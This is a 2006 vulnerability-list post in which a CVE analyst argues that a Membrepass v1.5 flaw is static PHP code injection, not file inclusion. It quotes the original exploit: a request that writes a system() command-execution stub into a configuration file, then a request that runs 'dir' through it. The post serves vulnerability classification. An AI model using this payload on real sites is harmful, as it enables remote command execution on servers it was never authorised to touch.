[VIM] membrepass PHP execution issue probably isn't file inclusion

Steven M. Christey coley at mitre.org
Fri Sep 1 16:05:17 EDT 2006


BUGTRAQ:20060831 Membrepass v1.5 Php code execution, Xss, Sql Injection

This is being referred to as file inclusion by some people, but it's
what CVE is calling "direct static code injection" (though I'll
probably drop the "direct" soon).

That's the term we use for when a product accepts user input and
inserts it directly into an executable PHP file that the product uses,
normally for configuration variables.

The relevant exploit from the original disclosure is:

  GET /include/change.php
      DATA ainfo="; $cmd = $_GET['cmd']; system($cmd); exit;

The ainfo parameter isn't getting a URL, so that should be a tip that
it's not file inclusion.

Then you have a direct request:

  http://.../include/variable.php?cmd=dir POST

... which is probably the file that the code is being inserted into.

- Steve

More information about the VIM mailing list